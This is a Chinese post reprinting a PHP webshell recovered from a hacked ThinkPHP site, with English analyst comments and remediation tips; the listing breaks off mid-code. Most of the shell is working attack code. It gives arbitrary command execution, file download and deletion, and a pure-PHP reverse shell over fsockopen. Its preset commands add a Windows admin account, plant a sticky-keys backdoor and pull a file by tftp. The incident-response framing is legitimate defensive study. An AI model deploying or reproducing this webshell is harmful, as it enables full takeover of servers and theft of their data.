前言

最近朋友的网站老是被挂马，原因是网站用 ThinkPHP 5.0.23 搭建：该版本框架存在远程命令执行漏洞，攻击者借此在服务器上拉取了一个后门程序（PHP webshell）。找到之后发现这个程序功能非常全面，分享出来供大家学习分析之用，请勿用于犯罪行为或商业用途。需要说明的是，下面贴出的样本已经做了脱敏处理：反弹 shell 用的 perl/python/C 载荷（`$shell`、`$c_bin`）、`getinfo()` 的函数体、扫描后门用的特征库 `$matches`，以及 phpeval 页里的 `base64_decode('')` 都被清空了，口令常量 `$password` 在本文代码中也没有任何比对逻辑，所以直接拷贝运行并不能还原完整功能。处置建议：把框架升级到已修复该漏洞的版本；全站搜索落地文件（`t00ls`、`t00ls.pl`、`t00ls.py`、`t00ls.txt`、`cmd.exe` 等）以及带 `go`/`getpwd`/`pass`/`check` 参数的 POST 请求日志；检查服务器是否有对 `mytool.chinaz.com` 的外联。

效果图

后门程序

  <?php
  // === Analyst annotation (incident response) ================================
  // This file is a PHP web shell recovered from a compromised ThinkPHP 5.0.23
  // site. Comments were added for defenders; the executable code is unchanged.
  // Several payloads are blanked in this copy ($shell and $c_bin in backshell(),
  // the base64_decode('') in the phpeval tab, the body of getinfo(), and the
  // $matches signature lists), so parts of the shell are inert as listed.
  // ============================================================================
  error_reporting(E_ERROR);               // suppress notices/warnings (also hides the undefined VERSION constant below)
  @ini_set('display_errors','Off');
  @ini_set('max_execution_time',20000);   // long limit: recursive scans and the reverse-shell loop run for a while
  @ini_set('memory_limit','256M');
  header("content-Type: text/html; charset=utf-8");
  // 32-hex (md5-shaped) access token. Nothing in this listing ever compares it;
  // the authentication check was presumably stripped along with the payloads.
  $password = "5bb80217256f6be095f73fdae53a04ab"; //V
  define('B','Denzel-你的英雄'); // title (constant B is never read; the page echoes VERSION instead)
  // Normalise a path: backslashes and '//' become '/', and the %27/%22 escapes
  // that showdir()/scanfile() emit for the JS layer are turned back into quotes.
  function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }
  // Recursively stripslashes() an array (undoes magic_quotes_gpc on $_POST).
  function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }
  // Absolute path of this script; SCRIPT_FILENAME is preferred over __FILE__.
  $myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
  // If the path contains 'eval()' (the shell was run through eval() rather than
  // as a file) keep only the part before the first '('.
  $myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile;
  define('THISDIR',strdir(dirname($myfile).'/'));                                         // directory the shell lives in
  define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/')); // web root = script path minus PHP_SELF
  define('EXISTS_PHPINFO',getinfo() ? true : false);   // getinfo() is an empty stub below, so this is always false
  if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }
  // Detect loaded database client extensions; shown in the header bar and used by the "sql" tab.
  if(function_exists('mysql_close')) { $issql = 'MySql'; }
  if(function_exists('mssql_close')) $issql .= ' - MsSql';
  if(function_exists('oci_close')) $issql .= ' - Oracle';
  if(function_exists('sybase_close')) $issql .= ' - SyBase';
  if(function_exists('pg_close')) $issql .= ' - PostgreSql';
  $win = substr(PHP_OS,0,3) == 'WIN' ? true : false;
  $msg = VERSION;   // VERSION is not defined anywhere in this listing (only B is); it is echoed again in <title>
  // Write $filedata to $filename using fopen mode $filemode ('w'/'wb'/...).
  // An existing, non-writable file is chmod'ed to 0666 first so the write succeeds.
  // Returns fputs()'s byte count (0 for empty data, false on failure); callers
  // test it as a boolean, so writing an empty payload is reported as a failure.
  function filew($filename,$filedata,$filemode) {
      if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); }
      $handle = fopen($filename,$filemode);
      $key = fputs($handle,$filedata);
      fclose($handle);
      return $key;
  }
  // Read a whole file into a string. No size cap here; the scanners skip
  // MB-sized files themselves before calling this.
  function filer($filename) {
      $handle = fopen($filename,'r');
      $filedata = fread($handle,filesize($filename));
      fclose($handle);
      return $filedata;
  }
  // Place an uploaded file: try move_uploaded_file(), then fall back to copy()
  // (which also works when the source is not an HTTP upload). Returns true/false.
  function fileu($filenamea,$filenameb) {
      $key = move_uploaded_file($filenamea,$filenameb) ? true : false;
      if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; }
      return $key;
  }
  // Stream any existing file to the browser as an attachment and exit.
  // There is no path restriction: this is the shell's arbitrary-file-download
  // primitive. Content-Type is faked as application/x-<extension>; the
  // output buffer is discarded first so nothing precedes the file bytes.
  // Returns false only when the file does not exist.
  function filed($filename) {
      if(!file_exists($filename)) return false;
      ob_end_clean();
      $name = basename($filename);
      $array = explode('.',$name);
      header('Content-type: application/x-'.array_pop($array));
      header('Content-Disposition: attachment; filename='.$name);
      header('Content-Length: '.filesize($filename));
      @readfile($filename);
      exit;
  }
  // List a directory as array('dir' => [path => name], 'file' => [path => name]).
  // Quotes in names are encoded as %27/%22 so they survive inside the JS onclick
  // strings; sd() on the page and strdir() on the server decode them again.
  // Returns false when the directory cannot be opened.
  function showdir($dir) {
      $dir = strdir($dir.'/');
      if(($handle = @opendir($dir)) == NULL) return false;
      $array = array();
      while(false !== ($name = readdir($handle))) {
          if($name == '.' || $name == '..') continue;
          $path = $dir.$name;
          $name = strtr($name,array('\'' => '%27','"' => '%22'));
          if(is_dir($path)) { $array['dir'][$path] = $name; }
          else { $array['file'][$path] = $name; }
      }
      closedir($handle);
      return $array;
  }
  // Recursively delete $dir (expected to end in '/'). Every entry is chmod'ed
  // to 0777 before removal and all errors are suppressed; returns rmdir()'s result.
  function deltree($dir) {
      $handle = @opendir($dir);
      while(false !== ($name = @readdir($handle))) {
          if($name == '.' || $name == '..') continue;
          $path = $dir.$name;
          @chmod($path,0777);
          if(is_dir($path)) { deltree($path.'/'); }
          else { @unlink($path); }
      }
      @closedir($handle);
      return @rmdir($dir);
  }
  // Human-readable byte count with two decimals and a B/K/M/G/T suffix.
  // scanfile() and antivirus() look for the letter 'M' in this string to
  // skip large files, so only MB-range sizes are treated as "large".
  function size($bytes) {
      if($bytes < 1024) return $bytes.' B';
      $array = array('B','K','M','G','T');
      $floor = floor(log($bytes) / log(1024));
      return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));
  }
  // True if any entry of $array occurs in $string (case-insensitive stristr).
  // Used to match a '.php|.asp' style extension list against a file name.
  function find($array,$string) {
      foreach($array as $key) { if(stristr($string,$key)) return true; }
      return false;
  }
  // Recursive file search ("搜索文件" tab); results are streamed as HTML edit links.
  //   $dir  start directory (trailing '/'),   $key  search term,
  //   $inc  name fragments a file must contain (false = any file),
  //   $fit  directory names to skip (false = none),
  //   $tye  truthy: search file contents, falsy: search file names,
  //   $chr  truthy: stristr (case-insensitive), falsy: strpos (case-sensitive)
  //         — the page labels this box "匹配大小写" (match case), which is the
  //         opposite of what the truthy branch does,
  //   $ran  0: recurse into readable subdirectories, otherwise this level only,
  //   $now  prefix stripped from paths in the generated links.
  // In the case-sensitive branch a file whose size() reads in 'M' never matches,
  // even in name mode; sizes shown in 'G'/'T' are not filtered.
  // Returns false if $dir cannot be opened, true otherwise.
  function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {
      if(($handle = @opendir($dir)) == NULL) return false;
      while(false !== ($name = readdir($handle))) {
          if($name == '.' || $name == '..') continue;
          $path = $dir.$name;
          if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }
          else {
              if($inc && (!find($inc,$name))) continue;
              $code = $tye ? filer($path) : $name;   // whole file contents or just the name
              $find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));
              if($find) {
                  // path relative to $now, quotes escaped for the JS onclick handler
                  $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
                  echo '<a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
                  flush(); ob_flush();
              }
              unset($code);
          }
      }
      closedir($handle);
      return true;
  }
  // Signature scan ("扫描后门" tab): walk $dir recursively and, for every file
  // whose name matches one of the extension lists in $exs (key => 'a|b|c'),
  // run each regex in $matches[key] over its contents. The first match between
  // 7 and 199 characters long is printed (escaped) with an edit link; matches
  // containing '$this->' or '[$vars[' are ignored as false positives. Files
  // whose size() reads in 'M' are skipped. $matches is empty in this listing,
  // so the scanner reports nothing as shipped. Returns false if $dir cannot
  // be opened, true otherwise.
  function antivirus($dir,$exs,$matches,$now) {
      if(($handle = @opendir($dir)) == NULL) return false;
      while(false !== ($name = readdir($handle))) {
          if($name == '.' || $name == '..') continue;
          $path = $dir.$name;
          if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }
          else {
              $iskill = NULL;   // key of the first extension list that matches this name
              foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }
              if(strpos(size(filesize($path)),'M')) continue;
              if($iskill) {
                  $code = filer($path);
                  foreach($matches[$iskill] as $matche) {
                      $array = array();
                      preg_match($matche,$code,$array);
                      if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;
                      $len = strlen($array[0]);
                      if($len > 6 && $len < 200) {
                          $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
                          echo '特征 <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
                          flush(); ob_flush(); break;
                      }
                  }
                  unset($code,$array);
              }
          }
      }
      closedir($handle);
      return true;
  }
  // Execute an OS command and return array('res' => output, 'msg' => HTML status).
  //   $cmd  raw command string — passed to the shell unescaped.
  //   $cwd  working directory, or the literal 'com' to force the COM path.
  //   $com  true also forces the COM path (used by the 'phpwin' reverse shell).
  // COM path (Windows only): runs cmd.exe /c via WScript.Shell and reads stdout.
  // Otherwise chdir($cwd) and use the first enabled primitive, in this order:
  // exec, shell_exec, system, passthru, popen, proc_open — disable_functions
  // must cover all six to neutralise this. The proc_open fallback sets a fixed
  // PATH, captures stdout and stderr, and also writes $cmd to the child's stdin.
  // 'msg' names the primitive that ran, or '<h1>NULL</h1>' when output was empty.
  function command($cmd,$cwd,$com = false) {
      $iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';
      if($cwd == 'com' || $com) {
          if($iswin && class_exists('COM')) {
              $wscript = new COM('Wscript.Shell');
              $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
              $stdout = $exec->StdOut();
              $res = $stdout->ReadAll();
              $msg = 'Wscript.Shell';
          }
      } else {
          chdir($cwd); $cwd = getcwd();
          if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }
          elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }
          elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }
          elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }
          elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }
          elseif(function_exists('proc_open')) {
              $env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
              $des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
              $process = @proc_open ($cmd,$des,$pipes,$cwd,$env);
              if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }
              @proc_close($process);
              $msg = 'proc_open';
          }
      }
      $msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用'.$msg.'执行成功</h2>';
      return array('res' => $res,'msg' => $msg);
  }
  // Reverse shell ("反弹端口" tab). Connects back to $ip:$port using $type:
  //   'pl'     write the base64 payload to $dir/t00ls.pl, chmod 777, run via /usr/bin/perl
  //   'py'     same with $dir/t00ls.py and /usr/bin/python
  //   'c'      write the binary $c_bin to $dir/t00ls, chmod 777, execute it
  //   'pcntl'  same file, launched with pcntl_exec() (replaces the PHP worker)
  //   'php' / 'phpwin'  pure-PHP shell over fsockopen(): sends php_uname() and a
  //            "[user:dir]# " prompt, then loops reading commands, handling 'cd '
  //            and 'exit' itself and passing the rest to command(); 'phpwin'
  //            forces command()'s WScript/COM path.
  // The dropped file is unlinked afterwards; IR should still look for t00ls,
  // t00ls.pl and t00ls.py in writable directories and for perl/python/unknown
  // children of the web server process.
  // $shell and $c_bin are blank in this listing: the dropper variants then write
  // an empty file, fputs() returns 0, $key stays falsy, and the function reports
  // "临时目录不可写" (temp dir not writable) instead of launching anything.
  function backshell($ip,$port,$dir,$type) {
      $key = false;
      $c_bin = '';
      switch($type) {
          case "pl" :
              $shell = '';
              $file = strdir($dir.'/t00ls.pl');
              $key = filew($file,base64_decode($shell),'w');
              if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }
              break;
          case "py" :
              $shell = '';
              $file = strdir($dir.'/t00ls.py');
              $key = filew($file,base64_decode($shell),'w');
              if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }
              break;
          case "c" :
              $file = strdir($dir.'/t00ls');
              $key = filew($file,base64_decode($c_bin),'wb');
              if($key) { @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); }
              break;
          case "php" : case "phpwin" :
              if(function_exists('fsockopen')) {
                  $sock = @fsockopen ($ip,$port);
                  if($sock) {
                      $key = true;
                      $com = $type == 'phpwin' ? true : false;
                      $user = get_current_user();
                      $dir = strdir(getcwd());
                      // banner + prompt; the text mimics a classic netcat-style shell
                      fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");
                      while($cmd = fread($sock,1024)) {
                          if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }
                          elseif (trim(strtolower($cmd)) == 'exit') { break; }
                          else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }
                          fputs($sock,'['.$user.':'.$dir.']# ');
                      }
                  }
                  @fclose ($sock);
              }
              break;
          case "pcntl" :
              $file = strdir($dir.'/t00ls');
              $key = filew($file,base64_decode($c_bin),'wb');
              if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } }
              break;
      }
      // cleanup of the dropped file; $file is unset for the 'php' variants
      if(!$key) { $msg = '<h1>临时目录不可写</h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }
      return $msg;
  }
  // Empty stub in this copy: returns NULL, so EXISTS_PHPINFO is false and the
  // "info" tab never runs phpinfo(). Its original body is not in this listing.
  function getinfo() {
  }
  // Beacon/recon helper: sends the victim's HTTP_HOST to mytool.chinaz.com and
  // scrapes the "百度权重" (Baidu rank) digit out of the HTML. It is not called
  // anywhere in the visible listing. Network indicator: an outbound GET to
  // mytool.chinaz.com/baidusort.aspx?host=<victim host> from the web server.
  function links(){
      $hostr = $_SERVER["HTTP_HOST"];
      $arr = file_get_contents("http://mytool.chinaz.com/baidusort.aspx?host=".$hostr);
      $arr= iconv('UTF-8','GB2312' , $arr);
      preg_match_all("/<div class=\"siteinfo\">百度权重:<font color=\"blue\">[1-9]<\/font>/",$arr,$s);
      $c=$s[0][0];
      $c=str_replace("<div class=\"siteinfo\">百度权重:<font color=\"blue\">","",$c);
      $c=str_replace("</font>","",$c);
      return $c;
  }
  // Re-emit the session-carrying POST fields as hidden inputs so every form on
  // the page forwards them: getpwd, pass, the field whose NAME is $_POST['pass']
  // (the credential travels under an operator-chosen parameter name), and check.
  // Values are echoed without escaping. Detection hint: POST requests to a PHP
  // file carrying getpwd/pass/check together with a 'go' parameter.
  function subeval() {
      if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }
      if(isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="'.$_POST['pass'].'">'; }
      if(isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="'.$_POST['pass'].'" value="'.$_POST[$_POST['pass']].'">'; }
      if(isset($_POST['check'])) { echo '<input type="hidden" name="check" value="'.$_POST['check'].'">'; }
      return true;
  }
  // Pre-render handler: a 'down' action must stream the file before any HTML
  // is sent. godir/govar come straight from the form and strdir() only
  // normalises slashes, so any readable path on the host can be requested.
  if(isset($_POST['go'])) {
      if($_POST['go'] == 'down') {
          $downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);
          if(!filed($downfile)) { $msg = '<h1>下载文件不存在</h1>'; }
      }
  }
  ?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  <html>
  <head>
  <!-- Declares gb2312 although the PHP header() at the top of the file sent charset=utf-8 -->
  <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
  <style type="text/css">
  * {margin:0px;padding:0px;}
  body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Microsoft YaHei,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}
  a{color:#000000;text-decoration:none;vertical-align:middle;}
  a:hover{color:#FF0000;text-decoration:underline;}
  p {padding:1px;line-height:1.6em;}
  h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
  h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}
  form {display:inline;}
  input,select { vertical-align:middle; }
  input[type=text], textarea {padding:1px;font-family:Microsoft YaHei,sans-serif;}
  input[type=submit], input[type=button] {height:21px;}
  .tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}
  .tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
  .tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}
  .main {width:963px;margin:0 auto;padding:10px;}
  .outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
  .toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}
  .footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}
  .msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}
  .actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}
  .tables {width:100%;}
  .tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
  .tables td {background:#F9F6F4;height:19px;padding-left:2px;}
  </style>
  <script type="text/javascript">
  // Client-side glue: every action is a POST of the hidden forms 'gofrm' / 'frm' / 'frm1'.
  // $  : getElementById shorthand
  function $(ID) { return document.getElementById(ID); }
  // sd : decode the %22/%27 quote escapes that showdir()/scanfile() put into onclick strings
  function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }
  // cd : change directory (submits 'frm' with dir=...)
  function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }
  // sa : select-all checkbox helper
  function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }
  // go : submit 'gofrm' with go=<tab or action>, govar=<argument>; the editor opens in a new tab
  function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); }
  // nf : prompt for a new file/dir name, then go(a, name)
  function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } }
  // dels : delete selected files ('b') or a whole directory tree via act=deltree
  function dels(a) { if(a == 'b') { var msg = "所选文件"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删除"+msg+"吗")) { $('frm1').submit(); } }
  // txts / acts : prompt-driven actions on 'frm1' (var=<value> or var=<value>|x|<file>, act=<action>)
  function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }
  function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }
  </script>
  <title><?php echo VERSION.' - 【'.date('Y-m-d H:i:s 星期N',time()).'】';?></title>
  </head>
  <body>
  <div class="main">
  <div class="outl">
  <!-- Header bar discloses: server IP (SERVER_ADDR or resolved SERVER_NAME), php_uname(), the process user, uid/gid, and loaded DB extensions -->
  <div class="toptag"><?php echo ($_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])).' - '.php_uname().' - whoami('.get_current_user().') - 【uid('.getmyuid().') gid('.getmygid().')】'; if(isset($issql)) echo ' - 【'.$issql.'】';?></div>
  <?php
  // Tab definitions. $go (validated against $menu) only drives tab highlighting;
  // the switch that follows dispatches on the raw $_POST['go'].
  $menu = array('file' => '文件管理','scan' => '搜索文件','antivirus' => '扫描后门','backshell' => '反弹端口','exec' => '执行命令','phpeval' => '执行PHP','sql' => '执行SQL','info' => '系统信息');
  $go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';
  // Current directory: POST 'dir' (normalised) if given, else the shell's own directory.
  $nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;
  echo '<div class="tag">';
  // Tab links call go(tab, base64(cwd)); the scan/antivirus tabs base64_decode govar to recover the path.
  foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }
  echo '</div>';
  // Hidden navigation form submitted by go(): go = tab/action, godir = cwd, govar = argument.
  echo '<form name="gofrm" id="gofrm" method="POST">';
  subeval();
  echo '<input type="hidden" name="go" id="go" value="">';
  echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';
  echo '<input type="hidden" name="govar" id="govar" value="">';
  echo '</form>';
  303. switch($_POST['go']) {
  // "系统信息" tab: environment fingerprint for the operator. EXISTS_PHPINFO is
  // always false in this copy (getinfo() is empty), so $config/$phpini stay unset
  // and both rows show '(无)'. Values are echoed unescaped.
  case "info" :
      if(EXISTS_PHPINFO) {
          ob_start();
          phpinfo(INFO_GENERAL);
          $out = ob_get_contents();
          ob_end_clean();
          $tmp = array();
          // pull the "Configure Command" and "Configuration File" rows out of phpinfo's HTML
          preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);
          $config = $tmp[2][0];
          $phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];
      }
      $infos = array(
          '客户端浏览器信息' => $_SERVER['HTTP_USER_AGENT'],
          '被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)',
          '被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)',
          'PHP.ini配置路径' => $phpini ? $phpini : '(无)',
          'PHP运行方式' => php_sapi_name(),
          'PHP版本' => PHP_VERSION,
          'PHP进程PID' => getmypid(),
          '客户端IP' => $_SERVER['REMOTE_ADDR'],
          '客户端文字编码' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],
          'Web服务端口' => $_SERVER['SERVER_PORT'],
          'Web根目录' => $_SERVER['DOCUMENT_ROOT'],
          'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'],
          'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],
          'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)',
          '当前磁盘总大小' => size(disk_total_space('.')),
          '当前磁盘可用空间' => size(disk_free_space('.')),
          'POST最大字数量' => get_cfg_var("post_max_size"),
          '允许最大上传文件' => get_cfg_var("upload_max_filesize"),
          '程序最大使用内存量' => get_cfg_var("memory_limit"),
          '程序最长运行时间' => get_cfg_var("max_execution_time").'秒',
          '是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否',
          '是否支持Socket' => function_exists('socket_close') ? '是' : '否',
          '是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否',
          '是否支持Curl' => function_exists('curl_version') ? '是' : '否',
          '是否支持Zlib' => function_exists('gzclose') ? '是' : '否',
          '是否支持FTP' => function_exists('ftp_login') ? '是' : '否',
          '是否支持XML' => function_exists('xml_set_object') ? '是' : '否',
          '是否支持GD_Library' => function_exists('imageline') ? '是' : '否',
          '是否支持COM组建' => class_exists('COM') ? '是' : '否',
          '是否支持ODBC组建' => function_exists('odbc_close') ? '是' : '否',
          '是否支持IMAP邮件' => function_exists('imap_close') ? '是' : '否',
          // NOTE(review): the ini directive is spelled safe_mode; "safemode" is not a PHP setting, so this reads empty
          '是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否',
          '是否允许URL打开文件' => get_cfg_var("allow_url_fopen") ? '是' : '否',
          '是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否',
          '是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否',
          '是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否',
          '是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否',
          'PHP编译参数' => $config ? $config : '(无)'
      );
      echo '<div class="msgbox">'.$msg.'</div>';
      echo '<table class="tables"><tr><th style="width:26%;">名称</th><th>参数</th></tr>';
      foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }
      echo '</table>';
      break;
  // "执行命令" tab: runs POST execcmd through command(), either via the PHP
  // primitives (str=fun, cwd = THISDIR) or WScript/COM (str=com).
  // The preset dropdown documents the operator's playbook — useful IR indicators:
  //   - "写文件": appends <?php phpinfo();?> to THISDIR/t00ls.txt
  //   - "添加用户(Win)": creates local admin "$ahsec" with password "ahsec"
  //   - "shift后门(Win)": copies explorer.exe over sethc.exe (sticky-keys backdoor;
  //     the backslashes in these paths appear lost in this listing)
  //   - "Ftp下载(Win)": tftp -i <ip> get server.exe c:\server.exe
  // $cmd is escaped in the input box; $res['msg'] is echoed as raw HTML.
  case "exec" :
      $cmd = $win ? 'dir' : 'ls -al';
      $res = array('res' => '命令回显','msg' => $msg);
      $str = isset($_POST['str']) ? $_POST['str'] : 'fun';
      if(isset($_POST['execcmd'])) {
          $cmd = $_POST['execcmd'];
          $cwd = $str == 'fun' ? THISDIR : 'com';
          $res = command($cmd,$cwd);
      }
      echo '<div class="msgbox">'.$res['msg'].'</div>';
      echo '<form method="POST">';
      subeval();
      echo '<input type="hidden" name="go" id="go" value="exec">';
      echo '<div class="actall">命令 <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';
      echo '<select name="str">';
      $selects = array('fun' => 'phpfun','com' => 'wscript');
      foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }
      echo '</select> ';
      echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';
      echo '<option>---命令集合---</option>';
      echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt">写文件</option>';
      echo '<option value="whoami">whoami</option>';
      echo '<option value="systeminfo">版本信息(Win)</option>';
      echo '<option value="path">path(Win)</option>';
      echo '<option value="ipconfig /all">ipconfig(Win)</option>';
      echo '<option value="tasklist /svc">tasklist(Win)</option>';
      echo '<option value="netstat -an">netstat -an(Win)</option>';
      echo '<option value="net user">net user(Win)</option>';
      echo '<option value="net config workstation">net config workstation(Win)</option>';
      echo '<option value="net config server">net config server(Win)</option>';
      echo '<option value="net user $ahsec ahsec /add & net localgroup administrators $ahsec /add">添加用户(Win)</option>';
      echo '<option value="query user">query user(Win)</option>';
      echo '<option value="copy c:windowsexplorer.exe c:windowssystem32sethc.exe & copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe">shift后门(Win)</option>';
      echo '<option value="tftp -i ip地址 get server.exe c:\server.exe">Ftp下载(Win)</option>';
      echo '<option value="ps -ef">ps(Linux)</option>';
      echo '<option value="ifconfig">ifconfig(Linux)</option>';
      echo '<option value="cat /etc/syslog.conf">syslog.conf(Linux)</option>';
      echo '<option value="cat /etc/my.cnf">my.cnf(Linux)</option>';
      echo '<option value="cat /etc/hosts">hosts(Linux)</option>';
      echo '<option value="cat /etc/services">services(Linux)</option>';
      echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-版本集合</option>';
      echo '</select> ';
      echo '<input type="submit" style="width:50px;" value="执行">';
      echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';
      break;
  // "搜索文件" tab: renders the search form and, when a keyword is present,
  // streams scanfile() results below it. The start directory comes from POST
  // 'dir', or from the base64 cwd passed in govar by the tab link.
  case "scan" :
      $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
      $keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';
